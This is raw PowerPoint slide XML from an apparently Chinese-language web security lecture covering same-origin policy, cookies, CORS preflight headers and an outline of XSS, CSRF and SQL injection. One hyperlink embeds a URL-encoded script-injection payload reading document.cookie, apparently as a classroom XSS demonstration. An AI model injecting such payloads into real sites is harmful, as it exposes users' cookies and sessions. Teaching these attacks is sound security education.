          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:01.101" v="1690" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:01.101" v="1690" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:01.101" v="1690" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:09.553" v="1691" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:grpSpMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:51:09.553" v="1691" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2999759210" sldId="506"/>
            <ac:grpSpMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:21:02.590" v="394" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4161401888" sldId="506"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:21:02.590" v="394" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4161401888" sldId="506"/>
            <ac:spMk id="2" creationId="{E789ABE8-4255-EC47-8D68-8ED7D8484D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E7AF-09C2-4B56-84D8-4F22B62E37E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E96A-50AD-4CFD-B1EF-FCA4E717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AD8FE-23C3-4C46-B668-FFB5B3E661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7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0" name="Shape 4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XHR introduced by Microsoft in IE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218951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9" name="Shape 4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Auto-sanitization requires context-sensitivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371463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FE96A-50AD-4CFD-B1EF-FCA4E7179C1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 baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:ea typeface="SimHei" panose="020106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8354-8032-40B6-9547-D6163EAA5EBC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/30/2020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baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/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8630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B0E6-E2FC-41B4-834D-BD9ACB3E377B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6FC0-FA55-4E32-95D4-E86411D872AD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07858" indent="-253929"/>
            <a:lvl3pPr marL="761787" indent="-253929"/>
            <a:lvl4pPr marL="1015716" indent="-253929"/>
            <a:lvl5pPr marL="1269645" indent="-253929"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828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659139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507858" indent="-253929"/>
            <a:lvl3pPr marL="761787" indent="-253929"/>
            <a:lvl4pPr marL="1015716" indent="-253929"/>
            <a:lvl5pPr marL="1269645" indent="-253929"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828"/>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1828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65913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SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122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89B-8331-4213-97E6-71EB1280BB0E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>
            <a:lvl1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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr>
              <a:defRPr baseline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defRPr>
            </a:lvl5pPr>
          </a:lstStyle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8324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E77B-CE5C-4B38-8D20-CA52F567712F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9805-D056-4FE9-A713-728EF1540264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516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A726-DF32-4881-8F68-9BF86E03E172}" type="datetime1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 dirty="0"/>
              <a:t>Click to edit Master text styles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685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omic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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A4C3-DE48-4393-BA4E-25E3E0487F8C}" type="datetime1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3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BD9B-D63A-46B8-898E-3DEF0F7C531E}" type="datetime1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C574-660A-4818-88FA-01D826264EEE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015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fld id="{CF569232-186D-4826-B64B-DAC9FD333540}" type="datetime1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GB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GB" dirty="0"/>
              <a:t>Click to edit Master text styles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fld id="{5F45EB9B-66B3-4343-9F76-5D0042A87BA4}" type="datetime1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Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
          <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="q"/>
        <a:defRPr kumimoji="0" sz="26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kumimoji="0" sz="24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anose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="Ø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 typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="ü"/>
        <a:defRPr kumimoji="0" sz="2000" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
          <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49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search.com/search?q=Christo+Wilson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iendly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com/page.html?default=%3cscript%3ealert(document.cookie)%3c/script" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://site.com/page.html?default=French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com/search?q=whatever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int.cia.gov/projects/hitlist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EACD69D-2848-2C46-8B25-DF3CD8A7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59896-6D55-4557-B3DE-B0E1461C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0BAC3-DB9E-4F56-9632-0D9564AE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Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800">
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRP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9B09358B-59C0-CC46-BFF5-E32FC159D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52999-C62C-4C40-807B-F6811543BCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171119" y="6183085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November 30, 2020</a:t>
            </a:fld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5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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理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36659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每一个服务（数据源）都可以设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookies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第三方内嵌资源也可以设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="253929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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>问题：浏览器发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求时，应发送哪一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>？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仅满足路径约束的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（同源策略）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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同源策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Same-Origin Policy (SOP)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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一个主体不应访问其它源（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）的对象（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object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10E5A-A118-4488-AE6E-815997C34C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215059" y="2420683"/>
            <a:ext cx="842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&lt;img src=“http://www.images.com/cats/adorablekitten.jpg"&gt;&lt;/img&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29437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853" y="1848259"/>
            <a:ext cx="7383339" cy="2385810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"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$.get(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“http://api.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1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data.json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”</a:t>
            </a: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function(data) { …} );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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="210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data.json</a:t>
            </a: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HTTP/1.1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Host: api.com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Origin: http://example.com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HTTP/1.1 200 OK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1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Access-Control-Allow-Origin: http://example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="21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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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22397" y="2291196"/>
            <a:ext cx="524550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22397" y="3400567"/>
            <a:ext cx="524550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561" y="1802743"/>
            <a:ext cx="46038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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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7894" y="2341720"/>
            <a:ext cx="46038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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.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8651" y="3350922"/>
            <a:ext cx="460382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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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530900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预请求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786911"/>
            <a:ext cx="9027853" cy="4342553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/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OPTIONS /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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data.json</a:t>
            </a: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HTTP/1.1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Host: api.com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Origin: http://example.com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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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Access-Control-Request-Method: PUT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Access-Control-Request-Headers: X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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CustomHeader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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HTTP/1.1 200 OK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Access-Control-Allow-Origin: http://example.com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Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS</a:t>
            </a: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Access-Control-Allow-Headers: X-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0" err="1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CustomHeader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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304610">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="227013" algn="l"/>
                <a:tab pos="464344" algn="l"/>
                <a:tab pos="701675" algn="l"/>
                <a:tab pos="939006" algn="l"/>
                <a:tab pos="1176338" algn="l"/>
                <a:tab pos="1413669" algn="l"/>
                <a:tab pos="1651000" algn="l"/>
                <a:tab pos="1888331" algn="l"/>
                <a:tab pos="2125663" algn="l"/>
                <a:tab pos="2362994" algn="l"/>
                <a:tab pos="2600325" algn="l"/>
                <a:tab pos="2837656" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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Access-Control-Max-Age: 1000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="894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对特定的请求，必须先通过预请求检查是否有相关操作权限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除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx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, POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r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除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text/plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIME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620138" y="2644353"/>
            <a:ext cx="389164" cy="4953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5" name="Right Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7194485" y="3597047"/>
            <a:ext cx="389164" cy="86677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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25799397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Origin header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重要的一环</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是，它最早是为了其它目的提出的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>预防</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐私泄露问题？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>仅发送源，非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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499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0AC5-B469-4993-8770-D9C0BD57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024878-CF9F-47C7-A573-C0F11764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103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388FC-D8AE-4414-8DB6-3AB8036490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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用架构：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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOM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客户端攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CSRF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服务端攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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/>
              <a:t>HTML5的安全性改进</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PostMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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11012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E1077-DDA2-4F23-B0FF-86FC810C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SOP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353F5F-5565-4A9D-B2EA-6733EEAA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8392A-A8FD-45C5-A167-66A6F4115D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179235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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p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2F82C3-8040-466B-861C-AB63629502CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065971" y="2717561"/>
            <a:ext cx="495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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://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www.example.com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7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir/page.html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69B8FF-7DD0-41DA-BB7D-AAE1A2118FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065971" y="3270319"/>
            <a:ext cx="7759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  <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>http://www.example.com/dir2/other.html：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>同源</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>http://example.com/dir/other.html：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不同源（域名不同）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>http://v2.www.example.com/dir/other.html：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不同源（域名不同）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>http://www.example.com:81/dir/other.html：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不同源（端口不同）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409969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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3656"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>浏览器脚本语言</a:t>
            </a:r>
            <a:endParaRPr sz="3656"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 385">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7BCE2E-6B9C-4071-95AB-5703FC07336A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1661269"/>
            <a:ext cx="3521765" cy="353546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n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1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s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'what'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828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fn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function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(x, y) {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return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x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+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y;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828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arr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[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'foo'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'bar'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0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];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828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obj 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msg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s,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op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fn,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="261184">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/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};</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1828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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 391">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F67A63-09E3-4E70-9B59-ED056CB932B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
